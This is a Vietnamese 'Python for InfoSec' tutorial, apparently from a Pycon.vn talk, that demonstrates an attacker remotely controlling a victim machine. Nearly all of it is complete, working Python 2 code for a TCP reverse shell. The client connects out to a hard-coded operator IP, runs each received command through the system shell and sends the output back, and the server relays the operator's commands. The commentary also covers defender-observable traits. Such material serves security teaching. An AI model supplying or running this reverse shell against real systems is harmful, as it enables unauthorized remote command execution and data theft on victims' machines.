Python for InfoSec: Demo TCP Reverse Shell



    Ví dụ này minh họa (demo) quá trình kẻ tấn công điều khiển máy nạn nhân và thực thi từ xa các câu lệnh như ipconfig, dir, ... nhằm mục đích đánh cắp và thay đổi thông tin. Mã nguồn bên dưới viết cho Python 2 (dùng câu lệnh print và raw_input).

    Client

    # Python For Security Pycon.vn
    # Email: khanhnn@pythonvietnam.info
    # Basic TCP Client
    import socket                     # For Building TCP Connection
    import subprocess                 # To start the shell in the system
    def connect():
        """Connect out to the hard-coded operator address and run what it sends.

        Every chunk received on the socket is handed to the system shell, and
        the child's stdout followed by its stderr is written back on the same
        socket. The loop ends when a chunk contains the substring 'terminate'.

        Defender notes: the channel is plain TCP with no encryption and no
        peer authentication, so commands and their output are readable by
        network monitoring. On the host, the observable behaviour is an
        interpreter process that holds an outbound socket while spawning
        shell child processes.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        # IPv4 stream (TCP) socket
        s.connect(('172.16.12.95', 8081))                            # outbound connection to the hard-coded operator IP and port
     
        while True:                                                 # keep receiving commands until told to stop
            command =  s.recv(1024)                                 # returns at most 1024 bytes; not guaranteed to be one whole command
            
            # Substring test on the raw chunk. This relies on Python 2, where
            # recv() returns str; on Python 3 it returns bytes and this test raises TypeError.
            if 'terminate' in command:                  # terminate order from the operator: close the socket and leave the loop
                s.close()
                break 
            
            else:                                      # otherwise the received text is passed to a shell process
                
                # shell=True hands the received text, unvalidated, to the system
                # shell. stdin is piped but never written to or closed in this block.
                CMD =  subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                s.send( CMD.stdout.read()  ) # read() blocks until the child closes stdout, then the output is sent back
                s.send( CMD.stderr.read()  ) # then the error stream, if any (e.g. a shell syntax error)
    
    def main ():
        """Entry point; only delegates to connect()."""
        connect()
    # Called unconditionally (there is no `if __name__ == "__main__":` guard),
    # so merely importing this file opens the outbound connection.
    main()
    

    Server

    # Python For Security Pycon.vn
    # Email: khanhnn@pythonvietnam.info
    # Simple TCP Server 
    import socket    # For Building TCP Connection
    
    def connect():
        """Listen on the hard-coded address, accept one client and relay commands.

        After a single accept(), each line typed at the "Shell> " prompt is
        sent to the client and one recv() of the reply is printed. Typing
        anything that contains 'terminate' sends the literal 'terminate',
        closes the client connection and ends the loop.

        Written for Python 2 (print statements, raw_input). Nothing here
        authenticates the connecting client or encrypts the traffic.
        """
        
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # IPv4 stream (TCP) socket
        
        s.bind(("172.16.12.95", 8081))                           # hard-coded listening IP and port (8081)
        
        s.listen(1)                                             # backlog of 1: a single connection from a single
                                                                # client is expected
        
        # NOTE(review): the banner says 8080 but the socket is bound to 8081 above.
        print '[+] Listening for incoming TCP connection on port 8080'
        
        conn, addr = s.accept()     # blocks until a client connects; returns the connection object (conn) and the client's
                                    # address as an (IP, port) tuple
        
        print '[+] We got a connection from: ', addr
    
    
        while True:
            
            command = raw_input("Shell> ")   # read one line from the operator (Python 2 raw_input)
            
            if 'terminate' in command:       # substring match: tell the client to stop, close the connection and leave the loop
                conn.send('terminate')
                conn.close()
                break
    
            else:
                conn.send(command)    # otherwise forward the typed line to the client unchanged
                print conn.recv(1024) # a single recv(): at most 1024 bytes of the reply are printed per command
            
        # The listening socket `s` is never closed in this function.
            
    def main ():
        """Entry point; only delegates to connect()."""
        connect()
    # Called unconditionally (there is no `if __name__ == "__main__":` guard),
    # so merely importing this file starts the listener.
    main()
    
